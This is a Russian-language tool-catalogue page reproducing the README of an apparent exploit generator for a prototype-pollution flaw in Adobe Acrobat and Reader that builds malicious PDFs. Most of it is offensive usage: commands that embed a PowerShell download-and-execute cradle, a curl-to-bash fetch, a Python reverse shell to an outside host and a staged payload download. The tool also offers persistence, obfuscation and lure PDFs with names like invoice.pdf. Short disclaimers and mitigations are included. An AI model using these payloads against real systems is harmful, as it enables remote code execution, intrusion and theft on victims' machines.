Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve_2026_34621_advanced — Сложный кроссплатформенный генератор эксплойтов для **CVE-2026-34621** — критической уязвимости загрязнения прототипа в Adobe Acrobat и Reader, которая приводит к обходу песочницы и произвольному выполнению кода в Windows и macOS. | Kitploit
Инструменты/GitHubGitHub/null200ok/cve_2026_34621_advanced
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

Сложный кроссплатформенный генератор эксплойтов для **CVE-2026-34621** — критической уязвимости загрязнения прототипа в Adobe Acrobat и Reader, которая приводит к обходу песочницы и произвольному выполнению кода в Windows и macOS.

Репозиторий
1354 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-34621 Advanced Exploit Generator

Python 3.7+ License

Сложный кроссплатформенный генератор эксплойтов для CVE-2026-34621 — критической уязвимости загрязнения прототипа в Adobe Acrobat и Reader, которая приводит к обходу песочницы и выполнению произвольного кода в Windows и macOS.

⚠️ ВАЖНОЕ ПРЕДУПРЕЖДЕНИЕ
Этот инструмент предназначен только для авторизованных исследований в области безопасности и пентеста.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения, является незаконным. Автор не несёт ответственности за неправомерное использование.


📋 Содержание

  • Обзор
  • Возможности
  • Установка
  • Быстрый старт
  • Примеры использования
    • Команды для Windows
    • Команды для macOS
  • Тестирование на мобильных устройствах
  • Параметры командной строки
  • Принцип работы
  • Затронутые версии
  • Меры защиты
  • Участие в разработке
  • Лицензия

  • 🔍 Обзор

    CVE-2026-34621 — это уязвимость нулевого дня в Adobe Acrobat и Reader, которая позволяет атакующему:

    1. Загрязнить прототип объекта JavaScript в движке Adobe.
    2. Обойти песочницу безопасности.
    3. Выполнить произвольные системные команды на машине жертвы.

    Этот генератор создаёт вредоносный PDF-файл, который при открытии в уязвимой версии Adobe Reader автоматически выполняет полезную нагрузку, адаптированную под операционную систему жертвы.

    Поддерживаемые целевые платформы:

    • ✅ Windows (полное выполнение произвольного кода)
    • ✅ macOS (полное выполнение произвольного кода)
    • ❌ Android / iOS (не уязвимы — только демонстрационный запасной вариант)

    ✨ Возможности

    КатегорияВозможности
    Кроссплатформенные полезные нагрузкиАвтоматическое определение ОС и выбор соответствующего метода выполнения команд Windows или macOS.
    Несколько векторов выполненияcmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS).
    Поэтапные полезные нагрузкиЗагрузка и выполнение полезных нагрузок второго этапа с удалённого URL-адреса.
    ПостоянствоУстановка ключа автозагрузки в реестре (Windows) или LaunchAgent (macOS).
    Методы обходаТри уровня обфускации JavaScript, привязка к окружению, задержки выполнения, полиморфный код.
    Встраивание в PDF-приманкуОбъединение эксплойта с легитимно выглядящим PDF-файлом (требуется PyPDF2).
    Несколько триггеровOpenAction, действие при открытии страницы или JavaScript на уровне документа.
    Подробные отчётыОтчёты в форматах HTML, TXT и JSON с описанием конфигурации полезной нагрузки.

    📦 Установка

    1. Клонирование репозитория

    root@kitploit:~
    git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
    cd CVE-2026-34621-Exploit
    

    2. (Необязательно) Создание виртуального окружения

    root@kitploit:~
    python3 -m venv venv
    source venv/bin/activate      # Linux/macOS
    venv\Scripts\activate         # Windows
    

    3. Установка зависимостей

    Основной скрипт использует только стандартную библиотеку Python. Для функции объединения с PDF-приманкой установите PyPDF2:

    root@kitploit:~
    pip install PyPDF2
    

    🚀 Быстрый старт

    Сгенерируйте базовый PDF-файл, который открывает калькулятор в Windows и macOS:

    root@kitploit:~
    python3 cve_2026_34621_advanced.py -o test.pdf
    

    Будут созданы следующие файлы:

    test.pdf — вредоносный PDF-файл.

    test_report.html — подробный HTML-отчёт.

    test_report.txt — текстовое резюме.

    test_config.json — экспорт конфигурации в JSON.

    💻 Примеры использования

    Команды для Windows

    1-Сценарий Команда

    A-Базовое всплывающее окно calc.exe

    root@kitploit:~
    python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
    

    Обратная оболочка PowerShell

    root@kitploit:~
    python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
    

    Поэтапная полезная нагрузка с постоянством

    root@kitploit:~
    python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
    

    Привязка к окружению (запуск только на "SALES-PC")

    root@kitploit:~
    python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
    

    С уровнем обфускации 2 и задержкой 10 секунд

    root@kitploit:~
    python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
    

    Команды для macOS

    2-Сценарий Команда

    Открыть калькулятор

    root@kitploit:~
    python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
    

    Загрузка и выполнение скрипта

    root@kitploit:~
    python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
    

    Обратная оболочка через Python

    root@kitploit:~
    python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
    

    Постоянство через LaunchAgent

    root@kitploit:~
    python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
    

    Встраивание в PDF-приманку

    root@kitploit:~
    python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
    

    3-Примечание о мобильном тестировании

    Сам скрипт запускается на настольных системах (Windows/macOS/Linux) для генерации PDF-файла. Сгенерированный PDF можно открыть на устройствах Android или iOS, но:

    Мобильные версии Adobe Acrobat Reader не уязвимы к CVE-2026-34621.

    Вместо выполнения системных команд полезная нагрузка запустит безобидный демонстрационный запасной вариант (откроет URL-адрес или покажет предупреждение).

    📖 Параметры командной строки

    Параметр Описание

    -o, --output FILE Обязательный. Имя выходного PDF-файла.

    --win CMD Команда Windows для выполнения (по умолчанию: calc.exe).

    --mac CMD Команда macOS для выполнения (по умолчанию: open /System/Applications/Calculator.app).

    --stage URL URL-адрес для загрузки полезной нагрузки второго этапа.

    -p, --persistence Установка механизма постоянства (реестр/LaunchAgent).

    -O, --obfuscate LEVEL Уровень обфускации JavaScript (0=нет, 1=базовый, 2=средний, 3=продвинутый).

    -d, --delay SECONDS Задержка выполнения на указанное количество секунд.

    -k, --key HOSTNAME Привязка к окружению — выполнение только при совпадении имени хоста.

    -l, --lure PDF Путь к легитимному PDF-файлу для использования в качестве приманки (объединяет эксплойт).

    --trigger TYPE Вектор запуска: openaction, pageopen или doclevel.

    --no-reports Пропустить генерацию отчётов HTML/TXT/JSON.

    --seed N Установить начальное значение генератора случайных чисел для воспроизводимой полиморфной генерации.

    ⚙️ Принцип работы

    Цепочка атаки

    Загрязнение прототипа:

    Встроенный JavaScript изменяет Object.prototype для внедрения вредоносных свойств (__trusted, privileged и т. д.). Это нарушает границу доверия JavaScript-движка Adobe.

    Повышение контекста

    Из-за загрязнённого прототипа движок ошибочно обрабатывает недоверенный JavaScript документа так, как если бы он выполнялся в привилегированном контексте.

    Доступ к привилегированным API

    Скрипт теперь может вызывать ограниченные API, такие как app.launchURL, util.readFileIntoStream и app.trustedFunction.

    Обход песочницы

    Эти API обеспечивают доступ к файловой системе и выполнение процессов за пределами песочницы Adobe.

    Выполнение произвольного кода

    Скрипт выполняет команду атакующего с помощью методов, зависящих от ОС:

    Windows: cmd.exe /c, PowerShell или WScript.Shell.

    macOS: обработчик URL Terminal.app или osascript.

    Уровни обфускации

    Уровень Описание

    0 Без обфускации — обычный читаемый JavaScript.

    1 Строковые литералы преобразуются в String.fromCharCode, имена переменных рандомизируются.

    2 Уровень 1 + внедрение мёртвого кода и мусорных комментариев.

    3 Весь скрипт кодируется в base64 и оборачивается в eval(atob(...)), затем повторно обфусцируется.

    🛡️ Затронутые версии

    Продукт Канал Уязвимые версии Исправленная версия

    Adobe Acrobat DC Continuous ≤ 26.001.21367 26.001.21411

    Adobe Acrobat Reader DC Continuous ≤ 26.001.21367 26.001.21411

    Adobe Acrobat 2024 Classic ≤ 24.001.30356 24.001.30362 (Win) / 24.001.30360 (macOS)

    🛠️ Меры защиты

    Немедленно обновитесь: установите последние обновления безопасности от Adobe.

    Отключите JavaScript в Adobe Reader: Правка → Настройки → JavaScript → снимите флажок «Включить JavaScript в Acrobat» (обратите внимание: это нарушает некоторые функции PDF).

    Используйте альтернативные просмотрщики PDF: рассмотрите возможность использования браузеров или сторонних просмотрщиков, которые не затронуты уязвимостью.

    🤝 Участие в разработке

    Приветствуется участие в разработке, но обратите внимание:

    Все запросы на включение изменений должны касаться оборонительных исследований, улучшения обнаружения или улучшения отчётности.

    Мы не принимаем изменения, которые повышают атакующие возможности инструмента сверх необходимого для легитимного тестирования.

    Чтобы внести вклад:

    Сделайте форк репозитория.

    Создайте ветку для новой функции.

    Отправьте запрос на включение изменений с чётким описанием внесённых изменений.

    📄 Лицензия

    Этот проект предоставляется только для образовательных целей и авторизованного тестирования безопасности.

    Используя это программное обеспечение, вы соглашаетесь с тем, что несёте ответственность за соблюдение всех применимых законов и нормативных актов.

    Автор снимает с себя всю ответственность за любое неправомерное использование или ущерб, причинённый этим инструментом.

    Скачать инструмент